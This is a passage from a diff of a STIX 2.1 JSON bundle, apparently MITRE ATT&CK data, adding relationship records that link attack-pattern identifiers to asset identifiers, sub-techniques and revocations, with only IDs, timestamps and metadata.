"x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--67b2b8c0-9c9e-4874-90ae-1fa083ace431", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--67cb8b15-0182-4ccf-865b-2dc07ed111e5", + "created": "2024-06-26T15:36:04.936Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:36:04.936Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--67dae594-4239-4756-a0bc-dee75de19e4c", + "created": "2023-09-29T17:07:14.259Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:07:14.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--67ddea1b-c56c-4f8e-906c-fded3538c72a", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--67e49fce-8e8d-4f8e-866e-735be867f02d", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--67eea522-63b3-41b0-88b9-f39770547ccf", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--67fbed54-e10c-4281-93f7-fe4c59a6f982", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6802de55-b063-41f3-b37c-07e5253418bc", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--68139f5c-b594-42ca-8a19-f0ba0389479f", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6821a691-06d0-427c-b71d-5e83a1adf8f7", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--682e6f1e-93c4-4a2a-8b1a-4afc06a34d72", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--682eac15-9d0a-4dc6-8a0a-29f4e15e0696", + "created": "2020-01-30T17:37:22.821Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f005e783-57d4-4837-88ad-dbe7faee1c51", + "target_ref": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--684c5ef2-d2ba-4d36-b947-d3cdae8a886a", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--685249f9-e51a-4914-8b7f-09679e04198b", + "created": "2023-09-28T19:49:11.359Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:49:11.359Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6854ec53-d250-4aab-8dd7-2e30f2b7555a", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--685a17a3-46ef-4cb6-adee-68c569f71da7", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43c9bc06-715b-42db-972f-52d25c09a20c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6884dc22-f442-4d84-b083-bacd2d8275c2", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--688d2041-5c8b-47e0-86e1-a8d16134bdb1", + "created": "2023-09-28T19:39:25.832Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:39:25.832Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6895a097-3e5d-43c7-b610-194eae79f8b0", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--68a528b5-ddc5-431a-9d63-eb2a6ce03559", + "created": "2020-03-10T18:31:00.596Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--53bfc8bf-8f76-4cd7-8958-49a884ddb3ee", + "target_ref": "attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--68aa12dd-edd9-4bc5-8b1d-e36cdcddb05a", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--68ca4087-f279-425f-872c-cdfcbaed8435", + "created": "2024-06-26T11:55:23.345Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T11:55:23.345Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf147104-abf9-4221-95d1-e81585859441", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--68e0f80d-86e4-47c4-9498-49fa72221ca2", + "created": "2020-03-27T21:04:50.409Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", + "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--68eb092e-fa23-4d6d-8a71-8653e962e7ed", + "created": "2020-02-25T18:35:42.851Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--e0033c16-a07e-48aa-8204-7c3ca669998c", + "target_ref": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--68ec949e-a000-4bcd-b001-ebc03f7f23f4", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--68f348b2-810c-40a0-8711-ac495d8ecf58", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--68f74e69-884d-42fc-b5a8-1c6ceb475528", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6905186c-0c88-472e-a3a3-2dca4cf1c874", + "created": "2020-03-27T21:16:58.932Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--692ff921-c74d-40a4-ab31-879aba5f247a", + "created": "2023-09-29T16:42:01.287Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:42:01.287Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--69371602-bcaa-445c-8867-451768e49ec3", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--696fe03b-95f6-400e-8bea-d9b16a2fd1b2", + "created": "2020-01-31T19:00:31.070Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--215190a9-9f02-4e83-bb5f-e0589965a302", + "target_ref": "attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--69867c0e-2c16-4f14-8fc4-368da0a0c7cb", + "created": "2024-06-26T13:51:14.290Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:51:14.290Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--698caadb-01c5-49de-a989-530637d3bb3e", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6996b257-e9b6-40a7-97d5-6e7c6e82dc0e", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--69a8e985-0fac-48d5-ba45-ac15bebdab4e", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--866d0d6d-02c6-42bd-aa2f-02907fdc0969", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--69c57c6d-bd7f-4061-aff0-11251f802be9", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--69cf4015-fae1-47f6-9253-1f99209288a5", + "created": "2023-09-29T16:27:34.964Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:27:34.964Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--69f399f4-e8cf-4df8-90d6-e70f33e7da1b", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": 